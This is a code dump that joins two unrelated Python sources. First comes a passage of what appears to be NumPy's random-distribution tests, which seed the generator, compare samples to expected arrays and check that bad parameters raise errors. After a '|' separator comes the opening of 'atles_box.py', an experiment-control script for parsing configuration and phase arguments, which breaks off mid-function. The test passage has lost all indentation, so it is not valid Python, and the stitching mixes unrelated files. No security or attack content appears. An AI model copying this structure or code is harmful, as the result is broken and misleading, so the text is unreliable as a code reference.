desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
np.random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
__index__ = __int__
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
np.random.seed(self.seed)
assert_equal(np.random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.setSeed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = np.random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, wald, 0.0, 1)
assert_raises(ValueError, wald, 0.5, 0.0)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2  # both equal right[0] == 3, so left == right, which is invalid
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState()._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
|
atles_box.py | #!/usr/bin/env python3
import argparse
import atexit
from collections import OrderedDict
try:
from ConfigParser import RawConfigParser
except ImportError:
from configparser import RawConfigParser
import logging
import os
import random
import pipes # TODO: move to python3 and use shlex.quote() instead
import signal
import sys
import threading
import time
import config
from common import Phase, get_boxname, mkdir
from box import experiment
def greedy_parse(s):
for _type in int, float:
try:
return _type(s)
except (ValueError, TypeError):
pass
return s
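# e.g. greedy_parse("3") -> 3, greedy_parse("0.5") -> 0.5,
# and greedy_parse("on") -> "on" (left as a string).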
def get_conf(args):
'''Read a configuration file, add configuration from cmdline args.'''
config_filename = args.inifile
if not os.path.isfile(config_filename):
logging.error("Configuration file not found: %s", config_filename)
sys.exit(1)
parser = RawConfigParser()
parser.read(config_filename)
conf = {}
# create a dictionary for each section
for section in parser.sections():
conf[section] = {}
for key in parser.options(section):
# Currently, all configuration options will be numeric.
# greedy_parse() converts each to a float or an int, if it can.
conf[section][key] = greedy_parse(parser.get(section, key))
# setup a 'general' section of the configuration
# (mostly for the record in the -setup.txt file)
conf['general'] = {}
conf['general']['notes'] = args.notes
conf['general']['inifile'] = args.inifile
conf['general']['boxname'] = get_boxname()
return conf
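# A minimal inifile sketch (hypothetical section and keys): get_conf() runs
# every value through greedy_parse(), so frame_w below comes back as int 160:
# [camera]
# frame_w = 160
# frame_h = 120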
def setup_phases(args, conf):
# create a dictionary for relevant cmdline arguments,
conf['phases'] = {}
section = conf['phases']
section['phases_argstrings'] = ' '.join("-p %s" % p for p in args.phases)
# setup phases data to be used during experiment execution
phase_args = [p.split(',') for p in args.phases]
phases = []
for i, (length, stim, background) in enumerate(phase_args):
# 1-based phase counting
phasenum = i+1
length = int(length)
# Determine and record whether stimulus is enabled for each phase
if stim == 'on':
dostim = True
elif stim == 'off':
dostim = False
elif stim == 'rand':
dostim = random.choice([True, False])
